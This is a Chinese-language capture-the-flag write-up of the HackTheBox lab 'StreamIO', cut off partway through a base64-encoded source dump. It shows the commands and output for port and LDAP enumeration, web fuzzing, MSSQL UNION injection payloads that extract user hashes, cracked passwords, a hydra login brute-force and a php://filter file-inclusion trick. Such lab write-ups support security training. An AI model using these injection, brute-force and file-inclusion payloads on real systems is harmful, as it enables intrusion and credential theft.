StreamIO-htb-writeup

0x00 靶场技能介绍

章节技能：MSSQL数据库SQL注入攻击、二级目录扫描、hydra登录表单爆破、PHP过滤器使用、配置文件敏感信息泄露、chisel工具端口转发、mssqlclient工具使用、crackmapexec密码验证枚举、sqlcmd命令查询数据库、Firefox密码文件搜集和密码解密、pyLAPS可用于检索LAPS密码、使用 PowerView 工具添加某用户到某组中、crackmapexec获取ntds密码、使用ldapsearch来枚举ms-MCS-AdmPwd

参考链接：https://0xdf.gitlab.io/2022/09/17/htb-streamio.html

参考链接：https://b0ysie7e.gitbook.io/articulos/write-up/hackthebox/2024-03-20-streamio

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.158

2、获取下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.158 -oG allports
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-11 06:37 CST
Nmap scan report for 10.10.11.158
Host is up (0.12s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49738/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds
                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
53,80,88,135,139,389,443,445,464,636,3269,5985,9389,49667,49673,49674,49738,                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,80,88,135,139,389,443,445,464,636,3269,5985,9389,49667,49673,49674,49738 -sC -sV --min-rate=10000 10.10.11.158 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-11 06:38 CST
Nmap scan report for 10.10.11.158
Host is up (0.11s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-10 21:35:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2024-04-10T21:36:47+00:00; -1h03m12s from scanner time.
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
|_http-server-header: Microsoft-HTTPAPI/2.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
636/tcp   open  tcpwrapped
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49738/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1h03m13s, deviation: 2s, median: -1h03m15s
| smb2-time: 
|   date: 2024-04-10T21:36:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.17 seconds

3、根据端口开放情况，目标靶机是一个域控，那就简单的ldap协议枚举下信息吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ ldapsearch -x -s base namingcontexts -H ldap://10.10.11.158
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=streamIO,DC=htb
namingcontexts: CN=Configuration,DC=streamIO,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=streamIO,DC=htb
namingcontexts: DC=DomainDnsZones,DC=streamIO,DC=htb
namingcontexts: DC=ForestDnsZones,DC=streamIO,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                                                                                                                                                            
┌──(kali㉿offsec)-[~/Desktop]
└─$ ldapsearch -H ldap://10.10.11.158 -x -s base -b '' "(objectClass=*)" "*" +
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: * + 
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=streamIO,DC=htb
ldapServiceName: streamIO.htb:dc$@STREAMIO.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=streamIO,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
 ion,DC=streamIO,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=streamIO,DC=htb
namingContexts: DC=streamIO,DC=htb
namingContexts: CN=Configuration,DC=streamIO,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=streamIO,DC=htb
namingContexts: DC=DomainDnsZones,DC=streamIO,DC=htb
namingContexts: DC=ForestDnsZones,DC=streamIO,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 143475
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=streamIO,DC=htb
dnsHostName: DC.streamIO.htb
defaultNamingContext: DC=streamIO,DC=htb
currentTime: 20240410214540.0Z
configurationNamingContext: CN=Configuration,DC=streamIO,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

4、接下来还是先绑定下本地hosts信息吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.158 watch.streamIO.htb streamIO.htb DomainDnsZones.streamIO.htb ForestDnsZones.streamIO.htb DC.streamIO.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.158 watch.streamIO.htb streamIO.htb DomainDnsZones.streamIO.htb ForestDnsZones.streamIO.htb DC.streamIO.htb

5、剩下的就是查看下WEB端口服务的内容了

http://10.10.11.158/

https://10.10.11.158/

https://streamio.htb/

https://watch.streamio.htb/

6、其实枚举到这个WEB端口的情况，我就知道这个靶机不是好打的，毕竟开放的端口多，WEB服务也多，说明兔子洞也多，先查看下网站是什么语言，再决定如何扫描靶机

7、扫描下目录文件情况吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u https://watch.streamio.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -e .php

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://watch.streamio.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Extensions       : .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

search.php              [Status: 200, Size: 253887, Words: 12366, Lines: 7194, Duration: 166ms]
static                  [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 106ms]
Search.php              [Status: 200, Size: 253887, Words: 12366, Lines: 7194, Duration: 143ms]
Index.php               [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 106ms]
INDEX.php               [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 130ms]
SEARCH.php              [Status: 200, Size: 253887, Words: 12366, Lines: 7194, Duration: 112ms]
blocked.php             [Status: 200, Size: 677, Words: 28, Lines: 20, Duration: 109ms]
Static                  [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 110ms]
                        [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 108ms]
:: Progress: [175328/175328] :: Job [1/1] :: 141 req/sec :: Duration: [0:13:59] :: Errors: 0 ::

https://watch.streamio.htb/search.php

https://watch.streamio.htb/blocked.php

8、继续扫主域名的目录

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u https://streamio.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -e .php

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://streamio.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Extensions       : .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
login.php               [Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 124ms]
register.php            [Status: 200, Size: 4500, Words: 905, Lines: 121, Duration: 116ms]
Images                  [Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 447ms]
admin                   [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 455ms]
css                     [Status: 301, Size: 148, Words: 9, Lines: 2, Duration: 103ms]
Contact.php             [Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 120ms]
About.php               [Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 119ms]
Index.php               [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 112ms]
Login.php               [Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 117ms]
js                      [Status: 301, Size: 147, Words: 9, Lines: 2, Duration: 106ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 114ms]
Register.php            [Status: 200, Size: 4500, Words: 905, Lines: 121, Duration: 113ms]
fonts                   [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 116ms]
IMAGES                  [Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 424ms]
INDEX.php               [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 114ms]
Fonts                   [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 108ms]
Admin                   [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 116ms]
CSS                     [Status: 301, Size: 148, Words: 9, Lines: 2, Duration: 429ms]
JS                      [Status: 301, Size: 147, Words: 9, Lines: 2, Duration: 122ms]
Logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 135ms]
CONTACT.php             [Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 160ms]
                        [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 448ms]
ABOUT.php               [Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 110ms]

https://streamio.htb/Register.php

shiyan
shiyan

https://streamio.htb/admin/master.php

9、截止到目前的信息，最先的突破口，估计就是那个电影的搜索目录了，最容易出现SQL注入漏洞，简单尝试下吧

https://watch.streamio.htb/search.php

1' AND 1=1 -- //

1' AND 1=2 -- //

10、到这里基本上就是存在SQL注入漏洞了，下面开始枚举出来一些数据

q=-1' union select 1,2,3,4 ,5,6 -- //

q=-1' union select 1,@@version,3,4 ,5,6  -- //

Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
Sep 24 2019 13:48:23 
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)

q=-1' union select 1,(select User_Name()),3,4 ,5,6  -- //

db_user

q=-1' union select 1,(select host_name()),3,4 ,5,6  -- //

DC

q=-1' union select 1,name,3,4 ,5,6 from sys.databases  -- //

master
model
msdb
STREAMIO
streamio_backup
tempdb

-1' union select 1,name,id,4 ,5,6 from STREAMIO.dbo.sysobjects where xtype='U'  -- //

movies
885578193
users
901578250


-1' union select 1,name,id,4,5,6 from STREAMIO.dbo.syscolumns where id='901578250'  -- //

id
901578250
is_staff
901578250
password
901578250
username
901578250

-1' union select 1,username,password,4,5,6 from users -- //

这里发现查不出来，但是命令都是对的，估计是字段限制吧，那就转变一下

-1' union select 1,username,3,4,5,6 from users -- //

admin
Alexendra
Austin
Barbra
Barry
Baxter
Bruno
Carmon
Clara
Diablo
Garfield
Gloria
James
Juliette
Lauren
Lenord
Lucifer
Michelle
Oliver
Robert
Robin
Sabrina
Samantha
Stan
Thane
Theodore
Victor
Victoria
William
yoshihide


-1' union select 1,password,3,4,5,6 from users -- //

0049ac57646627b8d7aeaccf8b6a936f
08344b85b329d7efd611b7a7743e8a09
083ffae904143c4796e464dac33c1f7d
0cfaaaafb559f081df2befbe66686de0
1c2b3d8270321140e5153f6637d3ee53
22ee218331afd081b0dcd8115284bae3
2a4e2cf22dd8fcb45adcb91be1e22ae8
35394484d89fcfdb3c5e447fe749d213
3577c47eb1e12c8ba021611e1280753c
384463526d288edcc95fc3701e523bc7
3961548825e3e21df5646cafe11c6c76
54c88b2dbd7b1a84012fabc1a4c73415
665a50ac9eaa781e4f7f04199db97a11
6dcd87740abb64edfa36d170f0d5450d
7df45a9e3de3863807c026ba48e55fb3
8097cedd612cc37c29db152b6e9edbd3
925e5408ecb67aea449373d668b7359e
b22abb47a02b52d5dfa27fb0b534f693
b779ba15cedfd22a023c4d8bcf5f2332
b83439b16f844bd6ffe35c02fe21b3c0


bf55e15b119860a6e6b5a164377da719
c660060492d9edcaa8332d89c99c9239
d62be0dc82071bccc1322d64ec5b6c51
dc332fb5576e9631c9dae83f194f8e70
ec33265e5fc8c2f1b0c137bb7b3632b5
ee0b8a0937abd60c2882eacb2f8dc49f
ef8f3d30a856cf166fb8215aca93e9ff
f03b910e2bd0313a23fdd7575f34a694
f87d3c0d6c8fd686aacc6627f1f493a5
fd78db29173a5cf701bd69027cb9bf6b

11、到这里就发现了一些账号密码，那就使用在线的破解网站进行密码破解把，这样快些

0049ac57646627b8d7aeaccf8b6a936f    Unknown Not found.
08344b85b329d7efd611b7a7743e8a09    md5 ##123a8j8w5123##
083ffae904143c4796e464dac33c1f7d    Unknown Not found.
0cfaaaafb559f081df2befbe66686de0    Unknown Not found.
1c2b3d8270321140e5153f6637d3ee53    Unknown Not found.
22ee218331afd081b0dcd8115284bae3    Unknown Not found.
2a4e2cf22dd8fcb45adcb91be1e22ae8    md5 $monique$1991$
35394484d89fcfdb3c5e447fe749d213    Unknown Not found.
3577c47eb1e12c8ba021611e1280753c    md5 highschoolmusical
384463526d288edcc95fc3701e523bc7    Unknown Not found.
3961548825e3e21df5646cafe11c6c76    Unknown Not found.
54c88b2dbd7b1a84012fabc1a4c73415    md5 $hadoW
665a50ac9eaa781e4f7f04199db97a11    md5 paddpadd
6dcd87740abb64edfa36d170f0d5450d    md5 $3xybitch
7df45a9e3de3863807c026ba48e55fb3    Unknown Not found.
8097cedd612cc37c29db152b6e9edbd3    Unknown Not found.
925e5408ecb67aea449373d668b7359e    Unknown Not found.
b22abb47a02b52d5dfa27fb0b534f693    md5 !5psycho8!
b779ba15cedfd22a023c4d8bcf5f2332    md5 66boysandgirls..
b83439b16f844bd6ffe35c02fe21b3c0    md5 !?Love?!123

bf55e15b119860a6e6b5a164377da719    Unknown Not found.
c660060492d9edcaa8332d89c99c9239    Unknown Not found.
d62be0dc82071bccc1322d64ec5b6c51    Unknown Not found.
dc332fb5576e9631c9dae83f194f8e70    Unknown Not found.
ec33265e5fc8c2f1b0c137bb7b3632b5    Unknown Not found.
ee0b8a0937abd60c2882eacb2f8dc49f    md5 physics69i
ef8f3d30a856cf166fb8215aca93e9ff    md5 %$clara
f03b910e2bd0313a23fdd7575f34a694    Unknown Not found.
f87d3c0d6c8fd686aacc6627f1f493a5    md5 !!sabrina$
fd78db29173a5cf701bd69027cb9bf6b    Unknown Not found.

其实这里破解出来的密码不多的，简单梳理下可以用的吧

##123a8j8w5123##
$monique$1991$
$hadoW
paddpadd
$3xybitch
!5psycho8!
!?Love?!123
physics69i
%$clara
!!sabrina$
66boysandgirls..

12、既然账号密码都是那个网站的上的 https://streamio.htb/ ， 呢就是开始尝试枚举登录吧

13、把上面的用户名和密码分别放到字典列表里，开始进行尝试

┌──(kali㉿offsec)-[~/Desktop]
└─$ hydra -L users.txt -p '66boysandgirls..' streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:Login failed"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-12 00:41:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:30/p:1), ~2 tries per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:Login failed
[443][http-post-form] host: streamio.htb   login: yoshihide   password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-12 00:42:22

14、下面使用上面破解的账号密码进行登录

https://streamio.htb/admin/

15、通过访问页面，没有发现什么页数的东西，但是可以使用ffuf进行目录枚举下，参数是名称形式的

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u https://streamio.htb/admin/?FUZZ -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H 'Cookie: PHPSESSID=4fe1ieam8fbpr6ksldsh717gn1' -fs 1678

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://streamio.htb/admin/?FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Header           : Cookie: PHPSESSID=4fe1ieam8fbpr6ksldsh717gn1
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 1678
________________________________________________

debug                   [Status: 200, Size: 1712, Words: 90, Lines: 50, Duration: 1191ms]
staff                   [Status: 200, Size: 12484, Words: 1784, Lines: 399, Duration: 1042ms]
user                    [Status: 200, Size: 2073, Words: 146, Lines: 63, Duration: 460ms]
:: Progress: [6453/6453] :: Job [1/1] :: 13 req/sec :: Duration: [0:04:43] :: Errors: 20 ::

16、访问debug功能，此选项仅适用于开发人员这里进行模糊枚举，发现可以进行包含前期的发现的地址

https://streamio.htb/admin/?debug=

https://streamio.htb/admin/master.php

https://streamio.htb/admin/?debug=master.php

这里估计是一个文件包含的代码，下面使用PHP的过滤器来查看源码

php://filter/convert.base64-encode/resource=master.php

17、尝试使用过滤器去访问

https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php

onlyPGgxPk1vdmllIG1hbmFnbWVudDwvaDE+DQo8P3BocA0KaWYoIWRlZmluZWQoJ2luY2x1ZGVkJykpDQoJZGllKCJPbmx5IGFjY2Vzc2FibGUgdGhyb3VnaCBpbmNsdWRlcyIpOw0KaWYoaXNzZXQoJF9QT1NUWydtb3ZpZV9pZCddKSkNCnsNCiRxdWVyeSA9ICJkZWxldGUgZnJvbSBtb3ZpZXMgd2hlcmUgaWQgPSAiLiRfUE9TVFsnbW92aWVfaWQnXTsNCiRyZXMgPSBzcWxzcnZfcXVlcnkoJGhhbmRsZSwgJHF1ZXJ5LCBhcnJheSgpLCBhcnJheSgiU2Nyb2xsYWJsZSI9PiJidWZmZXJlZCIpKTsNCn0NCiRxdWVyeSA9ICJzZWxlY3QgKiBmcm9tIG1vdmllcyBvcmRlciBieSBtb3ZpZSI7DQokcmVzID0gc3Fsc3J2X3F1ZXJ5KCRoYW5kbGUsICRxdWVyeSwgYXJyYXkoKSwgYXJyYXkoIlNjcm9sbGFibGUiPT4iYnVmZmVyZWQiKSk7DQp3aGlsZSgkcm93ID0gc3Fsc3J2X2ZldGNoX2FycmF5KCRyZXMsIFNRTFNSVl9GRVRDSF9BU1NPQykpDQp7DQo/Pg0KDQo8ZGl2Pg0KCTxkaXYgY2xhc3M9ImZvcm0tY29udHJvbCIgc3R5bGU9ImhlaWdodDogM3JlbTsiPg0KCQk8aDQgc3R5bGU9ImZsb2F0OmxlZnQ7Ij48P3BocCBlY2hvICRyb3dbJ21vdmllJ107ID8+PC9oND4NCgkJPGRpdiBzdHlsZT0iZmxvYXQ6cmlnaHQ7cGFkZGluZy1yaWdodDogMjVweDsiPg0KCQkJPGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249Ij9tb3ZpZT0iPg0KCQkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im1vdmllX2lkIiB2YWx1ZT0iPD9waHAgZWNobyAkcm93WydpZCddOyA/PiI+DQoJCQkJPGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ0biBidG4tc20gYnRuLXByaW1hcnkiIHZhbHVlPSJEZWxldGUiPg0KCQkJPC9mb3JtPg0KCQk8L2Rpdj4NCgk8L2Rpdj4NCjwvZGl2Pg0KPD9waHANCn0gIyB3aGlsZSBlbmQNCj8+DQo8YnI+PGhyPjxicj4NCjxoMT5TdGFmZiBtYW5hZ21lbnQ8L2gxPg0KPD9waHANCmlmKCFkZWZpbmVkKCdpbmNsdWRlZCcpKQ0KCWRpZSgiT25seSBhY2Nlc3NhYmxlIHRocm91Z2ggaW5jbHVkZXMiKTsNCiRxdWVyeSA9ICJzZWxlY3QgKiBmcm9tIHVzZXJzIHdoZXJlIGlzX3N0YWZmID0gMSAiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0KaWYoaXNzZXQoJF9QT1NUWydzdGFmZl9pZCddKSkNCnsNCj8+DQo8ZGl2IGNsYXNzPSJhbGVydCBhbGVydC1zdWNjZXNzIj4gTWVzc2FnZSBzZW50IHRvIGFkbWluaXN0cmF0b3I8L2Rpdj4NCjw/cGhwDQp9DQokcXVlcnkgPSAic2VsZWN0ICogZnJvbSB1c2VycyB3aGVyZSBpc19zdGFmZiA9IDEiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0Kd2hpbGUoJHJvdyA9IHNxbHNydl9mZXRjaF9hcnJheSgkcmVzLCBTUUxTUlZfRkVUQ0hfQVNTT0MpKQ0Kew0KPz4NCg0KPGRpdj4NCgk8ZGl2IGNsYXNzPSJmb3JtLWNvbnRyb2wiIHN0eWxlPSJoZWlnaHQ6IDNyZW07Ij4NCgkJPGg0IHN0eWxlPSJmbG9hdDpsZWZ0OyI+PD9waHAgZWNobyAkcm93Wyd1c2VybmFtZSddOyA/PjwvaDQ+DQoJCTxkaXYgc3R5bGU9ImZsb2F0OnJpZ2h0O3BhZGRpbmctcmlnaHQ6IDI1cHg7Ij4NCgkJCTxmb3JtIG1ldGhvZD0iUE9TVCI+DQoJCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ic3RhZmZfaWQiIHZhbHVlPSI8P3BocCBlY2hvICRyb3dbJ2lkJ107ID8+Ij4NCgkJCQk8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0iYnRuIGJ0bi1zbSBidG4tcHJpbWFyeSIgdmFsdWU9IkRlbGV0ZSI+DQoJCQk8L2Zvcm0+DQoJCTwvZGl2Pg0KCTwvZGl2Pg0KPC9kaXY+DQo8P3BocA0KfSAjIHdoaWxlIGVuZA0KPz4NCjxicj48aHI+PGJyPg0KPGgxPlVzZXIgbWFuYWdtZW50PC9oMT4NCjw/cGhwDQppZighZGVmaW5lZCgnaW5jbHVkZWQnKSkNCglkaWUoIk9ubHkgYWNjZXNzYWJsZSB0aHJvdWdoIGluY2x1ZGVzIik7DQppZihpc3NldCgkX1BPU1RbJ3VzZXJfaWQnXSkpDQp7DQokcXVlcnkgPSAiZGVsZXRlIGZyb20gdXNlcnMgd2hlcmUgaXNfc3RhZmYgPSAwIGFuZCBpZCA9ICIuJF9QT1NUWyd1c2VyX2lkJ107DQokcmVzID0gc3Fsc3J2X3F1ZXJ5KCRoYW5kbGUsICRxdWVyeSwgYXJyYXkoKSwgYXJyYXkoIlNjcm9sbGFibGUiPT4iYnVmZmVyZWQiKSk7DQp9DQokcXVlcnkgPSAic2VsZWN0ICogZnJvbSB1c2VycyB3aGVyZSBpc19zdGFmZiA9IDAiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0Kd2hpbGUoJHJvdyA9IHNxbHNydl9mZXRjaF9hcnJheSgkcmVzLCBTUUxTUlZfRkVUQ0hfQVNTT0MpKQ0Kew0KPz4NCg0KPGRpdj4NCgk8ZGl2IGNsYXNzPSJmb3JtLWNvbnRyb2wiIHN0eWxlPSJoZWlnaHQ6IDNyZW07Ij4NCgkJPGg0IHN0eWxlPSJmbG9hdDpsZWZ0OyI+PD